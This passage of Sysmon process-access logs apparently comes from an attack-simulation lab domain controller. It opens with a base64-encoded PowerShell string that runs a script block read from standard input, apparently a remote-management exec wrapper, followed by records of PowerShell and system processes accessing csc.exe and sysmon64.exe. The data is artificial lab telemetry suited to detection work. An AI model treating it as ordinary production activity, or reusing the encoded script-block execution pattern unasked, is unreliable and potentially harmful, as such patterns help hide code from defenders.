JgBjAGgAYwBwAC4AYwBvAG0AIAA2ADUAMAAwADEAIAA+ACAAJABuAHUAbABsAAoAJABlAHgAZQBjAF8AdwByAGEAcABwAGUAcgBfAHMAdAByACAAPQAgACQAaQBuAHAAdQB0ACAAfAAgAE8AdQB0AC0AUwB0AHIAaQBuAGcACgAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAgAD0AIAAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAF8AcwB0AHIALgBTAHAAbABpAHQAKABAACgAIgBgADAAYAAwAGAAMABgADAAIgApACwAIAAyACwAIABbAFMAdAByAGkAbgBnAFMAcABsAGkAdABPAHAAdABpAG8AbgBzAF0AOgA6AFIAZQBtAG8AdgBlAEUAbQBwAHQAeQBFAG4AdAByAGkAZQBzACkACgBJAGYAIAAoAC0AbgBvAHQAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAuAEwAZQBuAGcAdABoACAALQBlAHEAIAAyACkAIAB7ACAAdABoAHIAbwB3ACAAIgBpAG4AdgBhAGwAaQBkACAAcABhAHkAbABvAGEAZAAiACAAfQAKAFMAZQB0AC0AVgBhAHIAaQBhAGIAbABlACAALQBOAGEAbQBlACAAagBzAG8AbgBfAHIAYQB3ACAALQBWAGEAbAB1AGUAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADEAXQAKACQAZQB4AGUAYwBfAHcAcgBhAHAAcABlAHIAIAA9ACAAWwBTAGMAcgBpAHAAdABCAGwAbwBjAGsAXQA6ADoAQwByAGUAYQB0AGUAKAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADAAXQApAAoAJgAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAA==","EventReceivedTime":"2020-08-01 07:58:52","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:58:52","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4429,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:58:52.079\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:58:52.079","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:58:52","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:58:52","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4430,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:58:52.079\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:58:52.079","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:58:52","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:58:52","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4431,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:58:52.079\r\nSourceProcessGUID: {41C8662E-20BB-5F25-0000-0010A2710600}\r\nSourceProcessId: 1632\r\nSourceThreadId: 2396\r\nSourceImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetProcessGUID: {41C8662E-20BC-5F25-0000-0010FA820600}\r\nTargetProcessId: 4124\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+3332f6|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+270222|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+26fe9f|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+26f9ee|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+26f97a|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+26e48b|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+7c1ecb|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+7c1999|UNKNOWN(00007FFD1556AF2F)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:58:52.079","SourceProcessGUID":"{41C8662E-20BB-5F25-0000-0010A2710600}","SourceProcessId":"1632","SourceThreadId":"2396","SourceImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetProcessGUID":"{41C8662E-20BC-5F25-0000-0010FA820600}","TargetProcessId":"4124","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+3332f6|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+270222|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+26fe9f|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+26f9ee|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+26f97a|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+26e48b|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+7c1ecb|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+7c1999|UNKNOWN(00007FFD1556AF2F)","EventReceivedTime":"2020-08-01 07:58:52","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:58:52","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4432,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:58:52.079\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:58:52.079","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:58:52","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:58:52","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4433,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:58:52.079\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:58:52.079","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:58:52","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:58:52","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4434,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:58:52.079\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:58:52.079","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:58:52","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:58:52","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4435,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:58:52.079\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 2336\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-20BC-5F25-0000-0010FA820600}\r\nTargetProcessId: 4124\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:58:52.079","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"2336","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-20BC-5F25-0000-0010FA820600}","TargetProcessId":"4124","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:58:52","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:58:52","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4436,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:58:52.079\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 